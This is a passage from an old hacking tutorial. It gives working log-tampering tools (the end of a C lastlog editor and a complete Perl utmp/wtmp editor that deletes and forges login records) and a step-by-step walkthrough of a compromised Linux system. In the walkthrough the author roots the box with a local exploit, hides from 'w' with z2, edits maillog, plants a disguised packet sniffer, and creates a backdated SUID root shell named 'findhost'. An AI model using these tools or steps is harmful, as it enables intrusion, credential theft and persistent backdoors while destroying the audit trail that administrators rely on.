				printf("Fast forward how many entries? ");
				scanf("%d",&n);}
			if (c=='n') {
				cnt++;
				write(fd,&utmp,sizeof(struct lastlog));
				}
			if (c=='y') tot++;
			} 
		      }	}					
        }
        close(fp);
        close(fd);
        }
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
}

remnull(name)
char *name;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct lastlog utmp;
if (fp=open(file,O_RDONLY)) {
        fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
        while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
		if (utmp.ll_time) {
			cnt++;
			write(fd,&utmp,sizeof(struct lastlog));
		}
		else
			tot++;
	}
        close(fp);
        close(fd);
        }
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
}

usage()
{
printf("Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
printf("\t-h\tThis help\n");
printf("\t-f\tUse FILE instead of default\n");
printf("\t-a\tShow all entries found\n");
printf("\t-u\tShow all entries for USER\n");
printf("\t-b\tShow NULL entries\n"); 
printf("\t-e\tErase USER completely\n");
printf("\t-c\tErase all connections containing HOST\n");
printf("\t-z\tShow ZAP'd entries\n");
printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
}
---------------------------------------------------------------- cut here

A good perl script for editing utmp, wtmp, and checking processes.
It will also let you insert lines in wtmp.  So if you need to play you
can add clinton.whitehouse.gov logging into port ttyp3 and show he stayed
on the system for a few hours!

Running 'check' will let you know if someone is on the system and not showing
up in the utmp log.  Admins like to hide the fact that they are online
sometimes.  This will allow you to see their connection.  You must be root to
run the script, and they need perl 5.003+ on thier system.  After starting
the script just type help.

Here are some of the basic commands:

starts by loading wtmp

delete user username
delete host hostanme
write

read wtmp
delete user username
delete host hostname
write

do help for the rest ... the best wtmp,wtmp editor around!

Say thankyou i-e ;)

-----------------------start of utmpman.pl
#!/usr/bin/perl -w
#
# Variable defines.
my($utmp_location) = "/var/run/utmp";
my($wtmp_location) = "/var/log/wtmp";
my($shells_location) = "/etc/shells";
my($ttybase) = "tty";
my($ttyrange) = "pqrs";                 # TTYrange standard on most linux systems.
my($ttyports) = "012345657689abcfef";   # TTYports standard on most linux systems.

# Global initializations.
my($active_file) = "";
my(%entries) = {};
my(@cmdline) = ();
my(@shells) = ();

# Display banner.
print "\nutmp Manager v0.8\n\n";

# Access check.
die("utmpman :: You must be root to run this application!\n") unless ($> == 0);

# Read in valid shells.
if (defined($shells_location)) {
  open(SHELLFILE, "<$shells_location");
  @shells = ;
  close(SHELLFILE);
}
# Process "basename" of each shell.
@shells = map( { /([^\/\n]+)\n*$/; $1; } @shells);
                                 
print push(@shells) . " valid shells in $shells_location: @shells\n" if (defined(@shells));
readfile("$utmp_location");
print("\nutmpman: $active_file> ");
while () {
  process_cmd(split);
  print("\nutmpman: $active_file> ");
}

sub process_cmd {
  return if (!defined(@_));
  my(@line) = map { lc($_) } @_;
  
  $_ = shift(@line);
  SWITCH: {
        /^check$/     && do {
                           check_func(@line);
                           last SWITCH;
                         };

        /^delete$/    && do {
                           del_func(@line);
                           last SWITCH;
                         };  
                         
        /^help$/      && do {
                           help_func();
                           last SWITCH;          
                         };
                                      
        /^insert$/    && do {
                           ins_func(@line);
                           last SWITCH;
                         }; 
                                      
        /^list$/      && do {
                           list_func(@line);
                           last SWITCH;
                         };

        /^read$/      && do {
                           read_func(@line);
                           last SWITCH;
                         };
                                                                                              
        /^write$/     && do {
                           write_func(@line);
                           last SWITCH;
                         };              
                                                    
        /^quit|exit$/ && exit(0);
        
        # DEFAULT. 
        print ("Invalid command.\n");       
  }
}


# HELP

sub help_func {
  print << "EOM";

utmpManager Help
----------------

Note: -  is an argument.
      - [id=] is a token which expects a value as part of command
        (ie, insert id=p5 user=root 11/23/96). See the insert command.
      - A line is the full name to the tty port, ie ttyp0.
      - An id is the *unique* representation of the port
        (without the tty, etc), ie "p0" (for ttyp0).

  check
    - Perform user consistancy check. Use this to make sure that the data in
      utmp agrees with who is actually on the machine. This is useful in
      determining if a user is online with hidden ports, running nohup'd
      processes, or running iScreen.

  delete -
    - Delete entries #x to #y.

  delete host 
    - Delete *all* entries which match the substring .

  delete line|id 
    - Delete entry containing  or .

  insert {id=|line=} [type=] [user=] [host=] [ConnTime] {LogoffTime}
    - Insert an entry into utmp/wtmp files specifying any combination
      of id/line, type, username, host, connection time, and logoff time.
      (LogoffTime only valid for WTMP files.)

  list host 
    - List all entries matching the substring .

  list line|id 
    - List all entries matching  or .

  read utmp|wtmp|
    - Read entries from either default wtmp, default utmp, or an arbitrary
      filename. Note: arbitrary filenames MUST start with either "utmp" or
      "wtmp" to be used with this editor. Rename files *outside* of this
      editor if necessary. If read is executed without any arguments, it
      rereads the last given filename, which is displayed on the prompt.

  write {filename}
    - Write entries to file {filename}. If write is executed without any
      arguments, then entries will be written to the last given filename,
      which is displayed on the prompt.

EOM
}

# DELETE

sub del_func {
  my(@params) = @_;

  if (!push(@_)) {
    print("delete :: Not enough parameters. See \"help\" for syntax.\n");
    return undef;
  } elsif ($params[0] =~ /host|user|id|line/) {
    del_by_data(@_);
  } elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
    del_by_range($params[0]);
  } elsif ($params[0] =~ m/^(\d+)$/) {
    del_by_range("$1-$1");
  }
  
  # Renumber list after delete operation.
  resync();
}


sub del_by_range {
  my($range)=shift;
  $range =~ m/(\d+)*-(\d+)*/;
  my($lo, $hi, $count)=($1, $2, 0);
  
  $lo = 0 if (!defined($lo));
  $hi = scalar(keys(%entries)) if (!defined($hi));
  
  foreach (sort( { $a <=> $b } keys(%entries))) {
    if (($_ >= $lo) && ($_ <= $hi)) {
      delete($entries{$_});
      $count++;
    }
  }
  print "$count entries deleted.\n";
}               


sub del_by_data {
  my($op, $data) = @_;
  my($count) = 0;

  if ((length($data) < 5) && ($op eq "host")) {
    print "Must specify at least 5 characters for delete hostmask.\n";
    return undef;
  } elsif (((length($data) > 4) && ($op eq "id"))||
           ((length($data) > 11) && ($op eq "line"))) {
    print "Invalid $op specified.\n";
    return undef;
  }
  # Note: If we are deleting by user, then user must match, *exactly*!
  $data = "^" . pack("a8", $data) . "\$" if ($op eq "user");
  foreach (sort( { $a <=> $b } keys(%entries))) {
    if (%{$entries{$_}}->{$op} =~ m/$data/i) {
      delete($entries{$_});
      ++$count;
    }
  }
  if (!$count) {
    print "No $op entries matching $data.\n";
  } else {
    print "$count entries deleted.\n";
  }
}


# INSERT

# Date1 Time1 = DateTime1 => mm/dd/[cc]yy[:hh:mm[:ss]]
# Date2 Time2 = DateTime2 => (see above)
# user=
# host=
# id= | line=
#
# utmp:
# insert {id=|line=} [type=] [user=] [host=] [DateTime]
# wtmp:
# insert {id=|line=} [user=] [host=] [DateTime1] {DateTime2}

sub ins_func {
  my(%cmdopt)={};
  my($datetime1, $datetime2, $gmdate, $gmdate2);

  # Get random pid out of the way.
  $cmdopt{"pid"} = int(rand(32656)+100);
  $cmdopt{"addr"} = pack("a4", "");

  # Get command options.
  foreach (@_) {
    if (/=/) {
      local($key, $value)=split(/=/);
      $cmdopt{$key} = $value;
    } else {
      if (!defined($datetime1)) {
        $datetime1 = $_;
        next;
      }
      if (!defined($datetime2)) {
        $datetime2 = $_ ;
        next;
      }
      print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
      return undef;
    }
  }

  # Check for an illegal pair or illegal option.
  foreach (keys(%cmdopt)) {
    if (!(/^host|id|line|type|user|addr$/)) {
      print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
      return undef;
    }
    if (($_ eq "last") && ($active_file !~  m!/*utmp[^/]*$!i)) {
      print "insert :: LAST option only valid for utmp files.\n";
      return undef;
    }     
  }

  # Get date in seconds since 1970.
  $gmdate = SecsSince1970($datetime1);

  # Get ending date in seconds since 1970.
  $gmdate2 = SecsSince1970($datetime2) if (defined($datetime2));

  if (!defined($gmdate) || (!defined($gmdate2) && defined($datetime2))) {
    print "insert :: Invalid date specified.\n";
    return undef;
  }

  if (defined($gmdate2)) {
    if ($gmdate2 < $gmdate) {
      print "insert :: First date/time must be *later* than second date/time.\n";
      return undef;
    }
  }

  if (defined($cmdopt{"id"}) && defined($cmdopt{"line"})) {
    print "insert :: Insert by LINE or ID only. Please do not specify both.\n";
    return undef;
  }

  my($op);

  if (!defined($cmdopt{"id"})) {
    $cmdopt{"id"} = $cmdopt{"line"};
    $op = "line";
    if (!($cmdopt{"id"} =~ s/^$ttybase//)) { 
      print "insert :: Invalid line specified.\n"; 
      return undef; 
    }
  } else {
    $cmdopt{"line"} = $ttybase . $cmdopt{"id"};
    $op = "id";
  } 

  if (!(defined($cmdopt{"line"}) || defined($cmdopt{"id"}))) {
    print "insert :: Neither LINE nor ID value found. See \"help\" for syntax.\n";
    return undef;
  }
    
  my($searchdata) = ($active_file =~ m!/*utmp[^/]*$!i) ?  
    (pack(($op eq "line") ? "a12" : "a4", $cmdopt{$op})):$cmdopt{$op};
  my($epos1, $npos1, $epos2, $npos2) = ();
  my($oldpos, $count)=("", 0);

  foreach (sort( { $a <=> $b } keys(%entries))) {
    if ($active_file =~ m!/*utmp[^/]*$!i) {
      # Handle utmp insertion by line insertion.
      if (%{$entries{$_}}->{$op} eq $searchdata) {
        printf ("insert :: $op $searchdata already exists at position $_\n");
        # This needs to check every option in %cmdopt for defined or null.
        $count = 0;
        foreach (qw(user host time)) {
          if (defined($cmdopt{$_})) {
            $count++ if ($cmdopt{$_} ne "");
          }
        }
        if (!$count) {
          printf ("insert :: No other data specified. Entry unchanged.\n");
          return undef;
        }
        last;
      }
    } else {
      # Handle wtmp insertion by time position. (Messy)
      $epos1 = $oldpos if (defined($npos1) && !defined($epos1));
      $npos1 = $_ if (%{$entries{$_}}->{"time"} > $gmdate);
      last if (!defined($gmdate2) && defined($epos1));
      $epos2 = $oldpos if (defined($npos2)); 
      $npos2 = $_ if (%{$entries{$_}}->{"time"} > $gmtime2);
      last if (defined($epos2));
    }
    $oldpos = $_;
  }

  # Set any unspecified defaults.
  $cmdopt{"user"} = pack("a8", "")  if !defined($cmdopt{"user"});
  $cmdopt{"host"} = pack("a16", "") if !defined($cmdopt{"host"});
  $cmdopt{"type"} = 7               if !defined($cmdopt{"type"});

  # Determine end of list insertion positions. (IE, dates entered are after
  # dates in wtmp file or line/id not found in utmp file.
  $epos1 = (scalar(keys(%entries)) + 1) if (!defined($npos1));
  if (defined($datetime2)) {
    $epos2 = (scalar(keys(%entries)) + 1) if (!defined($npos2));
    ++$epos2 if (defined($gmtime2) && !defined($npos1));
  }

  # Parse insert data and insert entry.
  $epos1 = sprintf("%7.3f", ($npos1 - $epos1)/2) if (defined($npos1));
  $epos2 = sprintf("%7.3f", ($npos2 - $epos2)/2)
    if (defined($npos2) && defined($gmdate2));

  # Insert first entry.
  $cmdopt{"time"} = $gmdate;  
  @{$entries{$epos1}}{qw(type pid line id time user host addr)} = 
           @{%cmdopt}{qw(type pid line id time user host addr)};

  if (defined($epos2)) {
    $cmdopt{"user"} = pack("a8", "");
    $cmdopt{"host"} = pack("a16","");
    $cmdopt{"id"}   = pack("a4", "");
    $cmdopt{"time"} = $gmdate2;
 
    @{$entries{$epos2}}{qw(type pid line id time user host addr)} =
             @{%cmdopt}{qw(type pid line id time user host addr)};
  }

  resync();
}


# LIST

sub list_func {
  my(@params) = @_;

  if (!push(@_) || ($params[0] eq "all")) {
    list_by_range("-");
    return 0;
  } elsif ($params[0] =~ /^host|user|id|line$/) {
    list_by_data(@_);
    return 0;
  } elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
    list_by_range($params[0]);
    return 0;
  } elsif ($params[0] =~ m/^(\d+)$/) {
    list_by_range("$1-$1");
    return 0;
  }
                          
  print ("list :: Error in parameters. See \"help\" for syntax.\n");
  return undef;
}    


sub list_by_data {
  my($op, $data) = @_;
  my($count) = 0;

  foreach (sort( {$a <=> $b} keys(%entries))) {
    if (%{$entries{$_}}->{$op} =~ m/$data/i) {
      list_entry($_);
      ++$count;
    }
  }
  print "No $op entries matching $data.\n" if (!$count);
}


sub list_by_range {
  my($range)=shift;
  $range =~ m/(\d+)*-(\d+)*/;
  my($lo, $hi)=($1, $2);
  
  $lo = 0 if (!defined($lo));
  $hi = scalar(keys(%entries)) if (!defined($hi));
  
  foreach (sort( { $a <=> $b } keys(%entries))) {
    if (($_ >= $lo) && ($_ <= $hi)) {
      list_entry($_);
    }
  }
}               


sub list_entry {
  printf("#%3d - " . gmtime(%{$entries{$_}}->{"time"}), $_);
  printf("  %s/%s", @{$entries{$_}}{qw(id line)});
  printf(": %s ", %{$entries{$_}}->{"user"})
    if (%{$entries{$_}}->{"user"} ne pack("a8", ""));
  printf("from %s", %{$entries{$_}}->{"host"}) 
    if (%{$entries{$_}}->{"host"} ne pack("a16", ""));
  if (%{$entries{$_}}->{"addr"} ne "\0\0\0\0") {
    printf(" (%s)", longtodot4(%{$entries{$_}}->{"addr"}));
  }
  print ("\n");
  printf("%7sPID = %u\n", "", %{$entries{$_}}->{"pid"}) 
    if (%{$entries{$_}}->{"pid"} && (%{$entries{$_}}->{"user"} ne pack("a8","")));
}

#  printf "#$_ - %s %s/%s: %s from %s\n", @{$v}->{qw(time id line user host)};
#  now *that's* cool :-)
#  should be like this: @{$v}{qw(time id line user host)}
#  I had an extra -> in my first version.
#
# Or course, it's changed since then, but - "Thanks, Sil!" :)
#


# READ


sub read_func {
  my($arg)=shift;
  
  $arg = $utmp_location if ($arg eq "utmp");
  $arg = $wtmp_location if ($arg eq "wtmp");
  $arg = $active_file if (!defined($arg));
  
  if ($arg !~ m!/*[uw]tmp[^/]*$!) {
    print("read :: Filenames *must* start with either 'wtmp' or 'utmp' to be edited.\n");
    return undef;
  }
  
  readfile($arg);
}
   

# WRITE

sub write_func {
  my($file)=shift;
  my($count)=0;
  
  $file = $active_file if (!defined($file));
  if ($file !~ m!/*[uw]tmp[^/]*$!) {
    print ("write :: File must start with 'utmp' or 'wtmp'.\nRename file outside this program.\n");
    return undef;
  }
  if (!open(OUTFILE, ">$file")) {
    print ("write :: Can't open $file for output.\n");
    return undef;
  }
  binmode(OUTFILE);
  
  foreach (sort( { $a <=> $b } keys(%entries))) {
    printf OUTFILE ("%s", pack("i L a12 a4 L a8 a16 a4", 
      @{$entries{$_}}{qw(type pid line id time user host addr)}));
    $count++;
  }
  print ("$active_file: " . scalar(keys(%entries)) . " entries written.\n");
  close(OUTFILE);
}               


# CHECK

sub check_func {
  if (push(@_)) {
    print "check :: Invalid options specified. Please see \"help\"\n";
    return undef;
  }
  if ($active_file !~ m!/*utmp[^/]*$!) {
    print "check :: Command can only be run on utmp files.\n";
    return undef;
  }
  
  # Build struct of ports containing port name, device num and owner.
  # Note: Test run in grepstr may *not* be portable for all Unix
  #       types. Be forewarned! This was designed for Linux.
  # Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$/
  #       should return the same as what you expect in "struct utmp->ut_id".
  my($grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$";
  my(%ports) = {};
  my($user, $rdev) = ();

  opendir(DEVDIR, "/dev");
  my(@devfiles) = readdir(DEVDIR);
  @devfiles = grep(/$grepstr/, @devfiles);  
  close(DEVDIR);
  foreach (@devfiles) {
    /^$ttybase([$ttyrange][$ttyports])$/;
    if (!defined($1)) {
      print "check :: Warning! Could not extract port ID from $_.\n";
    } else {
      ($user, $rdev) = (stat("/dev/$_"))[4, 6];
      $user = getpwuid($user);
      $ports{$1} = newport($_, $rdev, $user);
    } 
  }
  
  # Check ownership of /dev ports.
  my(@logdev)=();
  foreach (sort(keys(%ports))) {
    push(@logdev, $_) if (%{$ports{$_}}->{"owner"} ne "root");
  }
  @logdev = sort(@logdev);
      
  # Check utmp (against ports detected as logged in);
  my(@logutmp)=();
  foreach (sort( { $a <=> $b } keys(%entries))) {
    if (defined(%{$entries{$_}}->{"user"}) && defined(%{$entries{$_}}->{"host"}) &&
        defined(%{$entries{$_}}->{"id"})   && defined(%{$entries{$_}}->{"pid"})) {
      push(@logutmp, %{$entries{$_}}->{"id"})  
        if ((%{$entries{$_}}->{"id"} =~ /[$ttyrange][$ttyports]/) &&
            ((%{$entries{$_}}->{"user"} ne pack("a8", "")) ||
            ((%{$entries{$_}}->{"host"} ne pack("a16", "")) &&
             (%{$entries{$_}}->{"id"} ne pack("a4", "")) &&
             (%{$entries{$_}}->{"line"} ne pack("a12", "")) &&
             (%{$entries{$_}}->{"pid"} > 0))));
    }
  }
  @logutmp = sort(@logutmp);

  # Check PIDs (find processes with active port ids)
  opendir(PIDDIR, "/proc");
  my(%processes) = {};
  my(@portprocesses) = ();
  foreach (grep(/\d+/, readdir(PIDDIR))) {
    local($procdata, $cmdline);
    open(PROCFILE, ";
    close(PROCFILE);
    if (-e "/proc/$_/stat") {
      local($cmdline, $devnum, $portid);
      ($cmd, $devnum) = (split(/ /, $procdata))[1, 6];
      # Remove surrouding () from command name.
      $cmd =~ s/[\(\)]//g;
      $portid = dev2id(\%ports, $devnum);
      if (defined($portid)) {
        push(@portprocesses, $portid)
          if (!defined(listpos(\@portprocesses, $portid))&&($$ != $_));
        $processes{$_} = newproc($cmd, $portid) if (defined($portid) && ($$ != $_));
      }
    }
  }
  close(PIDDIR);

  # A port is *not* logged in if there is no dev entry for port, no utmp entry
  # and no active processes.
  my(@validshellports) = ();
  foreach (sort( { $a <=> $b} keys(%processes))) {
    push(@validshellports, %{$processes{$_}}->{"port"}) 
      if (defined(listpos(\@shells, %{$processes{$_}}->{"cmd"}))&&
          !defined(listpos(\@validshellports, %{$processes{$_}}->{"port"})));
  }
  # Remove ports with valid shells from list of ports with active processes.
  my(@noshellports) = 
    sort(grep(!defined(listpos(\@validshellports, $_)), @portprocesses));
  @validshellports = sort(@validshellports);
  print "Ports with active /dev files: @logdev\n"
    if (defined(@logdev));
  print "Ports with utmp entries: @logutmp\n"
    if (defined(@logutmp));
  print "Ports with valid shells: @validshellports\n" 
    if (defined(@validshellports));
  print "Ports with active processes and *no* shells: @noshellports\n" 
    if (defined(@noshellports));
}  
  
    
# GENERAL

sub readfile {
  local($file);
  $file = shift;
  my($index)=1;
  my($buffer)="";

  # Insure we have a clean hash table before we start reading in the file.
  foreach (keys(%entries)) {
    undef(%{$entries{$_}});
    delete(${entries{$_}});
  }
    
  open(UTMPFILE, "<$file") || die("utmp-parse: Can't open $file - $!\n");
  binmode(UTMPFILE);
  # 1/17/96, struct utmp is 56 bytes (54 according to addition! :P).  
  while (read(UTMPFILE, $buffer, 56)) {
    $entries{$index++} = newutmp($buffer);
  }
  $active_file = $file;
  print ("$active_file: " . scalar(keys(%entries)) . " entries loaded.\n");
  close(UTMPFILE);
}


sub newutmp {
  my($newbuff) = shift;
  my($longaddr) = 0;
  
  $newnode = bless { 
    "type" => undef, "pid" => undef,  "line" => undef, "id"   => undef,
    "time" => undef, "user" => undef, "host" => undef, "addr" => undef
  }, 'UTMPNODE';
  
  @{$newnode}{qw(type pid line id time user host addr)}=
    unpack("i L a12 a4 L a8 a16 a4", $newbuff);
                             
  return $newnode;
}  


sub newport {
 
  $newnode = bless {
    "port" => undef, "rdev" => undef, "owner" => undef, "cmd" => undef,
  }, 'PORTNODE';
  
  @{$newnode}{qw(port rdev owner)} = @_;
  
  return $newnode;
}


sub newproc {
 
  $newnode = bless {
    "cmd" => undef, "port" => undef, 
  }, 'PROCNODE';
  
  @{$newnode}{qw(cmd port)} = @_;
  
  return $newnode;
}


# Renumber hashes to default order.
sub resync {
  my(%newhash) = ();
  my($count)=0;

  # Write ordered list in to temporary hash, deleting as we go.
  foreach (sort( {$a <=> $b} keys(%entries))) {
    $newhash{++$count} = $entries{$_};
    delete($entries{$_});
  }

  # Copy elements back in to original hash table.
  foreach (sort( {$a <=> $b} keys(%newhash))) {
    $entries{$_} = $newhash{$_};
  }
}


sub longtodot4 {
  my($addr)=shift;

  return join(".", map( ord($_), split(//, $addr)));
}

sub dev2id {
  my($portlist, $rdev) = @_;

  foreach (sort(keys(%{$portlist}))) {
    return $_ if (%{$portlist}->{$_}->{"rdev"}==$rdev);
  }                               
  return undef;
}


sub listpos {
  my($arrayref, $search) = @_;
  my($count) = 0;

$^W = 0;
  foreach (@{$arrayref}) {
    return $count if ($search eq ${$arrayref}[$count]);
    $count++;
  }
$^W = 1;

  return undef;
}


### DATE ROUTINES

# The following code taken & modified from the Date::Manip package.
# Here is his copyright:
#
## Copyright (c) 1995,1996 Sullivan Beck. All rights reserved.
## This program is free software; you can redistribute it and/or modify it
## under the same terms as Perl itself.


sub SecsSince1970 {
# Parse as mm/dd/[cc]yy[:hh:mm[:ss]]
  my($datetime) = shift;
  my($m,$d,$y,$h,$mn,$s) = ();

  # If date is not defined, then return local current date and time.
  return time() if (!defined($datetime));

  $datetime =~ 
    s!^(\d{1,2})/(\d{1,2})/(\d{4}|\d{2})(?:\:(\d{2}):(\d{2})(?:\:(\d{2}))?)?!!;
  ($m, $d, $y, $h, $mn, $s) = ($1, $2, $3, $4, $5, $6);
  $m--;

  # Finalize time components and check them.
  $y = (($y < 70) ? "20":"19" . $y) if (length($y)==2); 

  # This checks for any *non-matched* portion of $datetime. If there is such
  # an animal, then there is illegal data specified. Also screens for undefined
  # components which HAVE to be in ANY valid date/time (ie, month, day, year).
  return undef if (!defined($m) || !defined($d) || !defined($y) || length($datetime));

  # Set time components with unspecified values.
  $s = 0 if (!defined($s));
  $mn = 0 if (!defined($mn));
  $h = 0 if (!defined($h));

  # Check for ranges.
  return undef if (($m > 11)    || ($h > 23)    || ($mn > 59)   || ($s > 59));
                     
  # Begin conversion to seconds since 1/1/70.
  my($sec_now,$sec_70)=();
  $sec_now=DaysSince999($m,$d,$y);
  return undef if (!defined($sec_now));

  $sec_now--;
  $sec_now = $sec_now*24*3600 + $h*3600 + $mn*60 + $s;
  $sec_70 =30610224000;
  return ($sec_now-$sec_70);
}


sub DaysSince999 {
  my($m,$d,$y)=@_;
  my($Ny,$N4,$N100,$N400,$dayofyear,$days)=();
  my($cc,$yy)=();

  $y=~ /^(\d{2})(\d{2})$/;
  ($cc,$yy)=($1,$2);

  # Number of full years since Dec 31, 0999
  $Ny=$y-1000;

  # Number of full 4th years (incl. 1000) since Dec 31, 0999
  $N4=int(($Ny-1)/4)+1;
  $N4=0         if ($y==1000);

  # Number of full 100th years (incl. 1000)
  $N100=$cc-9;
  $N100--       if ($yy==0);

  # Number of full 400th years
  $N400=int(($N100+1)/4);

  # Check to insure that information returns a valid day of year.
  $dayofyear=dayofyear($m,$d,$y);
  return undef if (!defined($dayofyear));

  # Compute day of year.
  $days= $Ny*365 + $N4 - $N100 + $N400 + $dayofyear;

  return $days;
}


sub dayofyear {
  my($m,$d,$y)=@_;
  my(@daysinmonth)=(31,28,31,30,31,30,31,31,30,31,30,31);
  my($daynum,$i)=();
  $daysinmonth[1]=29  if (!($y % 4));

  # Return error if we are given an invalid date.
  return undef if ($d > $daysinmonth[$m]);

  $daynum=0;
  for ($i=1; $i<$m; $i++) {
    $daynum += $daysinmonth[$i];
  }
  $daynum += $d;
  
  return $daynum;
}


## END DATE ROUTINES.
      
# End of script.

0;

--------------------- end of utmpman.pl

-------------------------
Chapter VI
Cleaning the log files
-------------------------

------------------------------
Section 6A
A walk around a hacked system
-------------------------------

I can't stress the importance of this enough! Clean, Clean!!!!  In this section
I will take you on the system first hand and show you some basics on what to
look for, and on how to wipe your presence from the system.  To start this lets
logon a system:

Here is the step by step through the basic process:

******----> see who is on the machine

[/home/master]finger @victim.net
[victim.net]
No one logged on.

******----> good no one on, we will log on

[/home/master]telnet victim.net

Trying xxx.206.xx.140...
Connected to victim.net.
Escape character is '^]'.

Welcome to Victim Research Linux (http://www.victim.net) Red Hat 2.1
Kernel 1.2.13 on a i586


ns.victim.net login: jnsmith
Password:
Linux 1.2.13.
You have new mail.

******----> Don't read his mail, you can cat all mail in /var/spool/mail
            and in each users /home/username/mail directory

******----> Check again to see if anyone is on

[jnsmith@ns jnsmith]$ w

5:36am  up 18 days,  8:23,  1 user,  load average: 0.01, 0.00, 0.00
User     tty       login@  idle   JCPU   PCPU  what
jnsmith   ttyp1     5:35am                      w

******----> Just me, lets get root and get lost in the utmp!

[jnsmith@ns jnsmith]$ cd .term

******----> Nice directory to hide stuff ;)

[jnsmith@ns .term]$ ./.u

******----> I had this already waiting, it was the umounc.c exploit

Discovered and Coded by Bloodmask and Vio, Covin 1996

******----> We are now root, lets use z2 to become invisible

bash# z2 jnsmith
Zap2!

******----> Let's see if we are still on ...

bash# w
5:37am  up 18 days,  8:24,  0 users,  load average: 0.08, 0.02, 0.01
User     tty       login@  idle   JCPU   PCPU  what

******----> Hmm. now there is no one on the system, i must have logged off ;)


******----> We know we are root, but lets check you you can see ...

bash# whoami
root
bash#

******----> Yup, root ..  What directory are we in?

bash# pwd
/home/jnsmith/.term

******----> Let's check the logs

bash# cd /var/log

******----> most of the time in /var/adm, this box uses /var/log

bash# grep dormroom *
maillog:Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
maillog:Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com

******----> Yup, the z2 took care of everything but this maillog ...

bash# pico maillog

******----> in pico i did a ctrl w, and searched for dormroom then ctrl k to
            delete lines


******----> These were the lines deleted

Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.com
Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com

bash# grep dormroom *

******----> Yup .. all clear ;)

bash# w
5:41am  up 18 days,  8:27,  0 users,  load average: 0.00, 0.00, 0.00
User     tty       login@  idle   JCPU   PCPU  what

******----> Yup .. all clear here too ;)

******----> Lets show you how you would use lled and wted if the grep would
            have shown something in those files

bash# cd ~jnsmith/.term
bash# lled
bash# lled -c dormroom.playhouse
Entries stored: 527 Entries removed: 0
Now chmod lastlog.tmp and copy over the original /var/log/lastlog

******----> Nothing in the lastlog

bash#
bash# wted -e jnsmith
Entries stored: 254 Entries removed: 0
Now chmod wtmp.tmp and copy over the original /var/log/wtmp

******----> Nothing in the wtmp, both of these would have shown in the grep
            we just did in the /var/log (just showing you the commands)

******----> Lets do some sniffing ...

bash# pico linsniffer.c

******----> I changed this line to tell where i want the log to go:

#define TCPLOG "/tmp/.pinetemp.000"

******----> lets look at what is running to think of a name that
            looks almost like it belongs there

bash# ps -aux

root       143  0.0  0.0   84    0  ?  SW  Jan 10   0:01 (lpd)
root       154  0.0  0.0  118    0  ?  SW  Jan 10   0:00 (smbd)
root       163  0.0  0.5   76  176  ?  S   Jan 10   0:00 nmbd -D
root       197  0.0  0.0   76    0 v03 SW  Jan 10   0:00 (getty)
root       198  0.0  0.0   76    0 v04 SW  Jan 10   0:00 (getty)
root       199  0.0  0.0   76    0 v05 SW  Jan 10   0:00 (getty)
root       200  0.0  0.0   76    0 v06 SW  Jan 10   0:00 (getty)
root       201  0.0  0.0   88    0 s00 SW  Jan 10   0:00 (uugetty)
root       209  0.0  0.2   35   76  ?  S   Jan 10   0:01 (update)
root       210  0.0  0.3   35  124  ?  S   Jan 10   0:03 update (bdflush)
root     10709  0.0  1.4  152  452  ?  S   Jan 27   0:10 httpd
root     11111  0.0  1.4  152  452  ?  S   Jan 27   0:07 httpd
root     14153  0.0  0.8   70  268  ?  S   Jan 16   0:03 ./inetd
root     14307  0.0  4.7 1142 1484  ?  S   Jan 16   1:16 ./named
root     14365  0.0  0.0   76    0 v02 SW  Jan 16   0:00 (getty)
root     17367  0.0  1.4  152  452  ?  S    11:01   0:02 httpd

******----> lets compile it and name it nmb

bash# gcc linsniffer.c -o nmb

******----> lets load it ...

bash# nmb&
[1] 22171

******----> lets check the log file in /tmp

bash#
bash# cd /tmp
bash# ls -al .pin*
total 15691
-rw-rw-r--   1 root     jnsmith          0 Jan 29 05:50 .pinetemp.000

******----> There it is, but we don't want our login to know about it!

bash# chgrp root .pin*

******----> Lets look now ....

bash# ls -al .pin*
-rw-rw-r--   1 root     root            0 Jan 29 05:50 .pinttemp.000
bash#

******----> This is good, Lets make an SUID shell so we don't have to
            do this again.  (check for MD5 or other programs in the cron)

bash# cd /bin
bash# ls -l sh
lrwxrwxrwx   1 root     root            4 Mar  1  1996 sh -> bash

******----> This is a sym link ...

bash# ls -l bash
-rwxr-xr-x   1 root     root       299296 Nov  2  1995 bash

******----> here is the real file ... lets see what to name it that
            looks like it belongs

bash# ls
arch           df             ksh            ping           tar
ash            dmesg          ln             ps             tcsh
bash           dnsdomainname  login          pwd            true
cat            domainname     ls             red            ttysnoops
chgrp          echo           mail           rm             umount
chmod          ed             mkdir          rmdir          uname
chown          false          mknod          sed            vi
cp             findterm       more           setserial      view
cpio           gunzip         mount          sh             vim
csh            gzip           mt             stty           zcat
date           hostname       mv             su             zsh
dd             kill           netstat        sync

******----> How about a new command in linux, most admin's won't know
            the difference ;)  We will call it findhost

bash# cp bash findhost

******----> ok, now lets have a look at our new unix command ...

bash# ls -l findhost
-rwxr-xr-x   1 root     jnsmith     299296 Jan 29 05:59 findhost

******----> We need to change the group owner, touch the file date,
            and make it SUID

bash# chgrp root findhost
bash# ls -l findhost
-rwxr-xr-x   1 root     root       299296 Jan 29 05:59 findhost

bash# chmod +s findhost
bash# ls -l findhost
-rwsr-sr-x   1 root     root       299296 Jan 29 05:59 findhost

bash# touch -t 111312331995 findhost
bash# ls -l findhost
-rwsr-sr-x   1 root     root       299296 Nov 13  1995 findhost

bash# ls -l m*
-rwxr-xr-x   1 root     root        64400 Oct 31  1995 mail
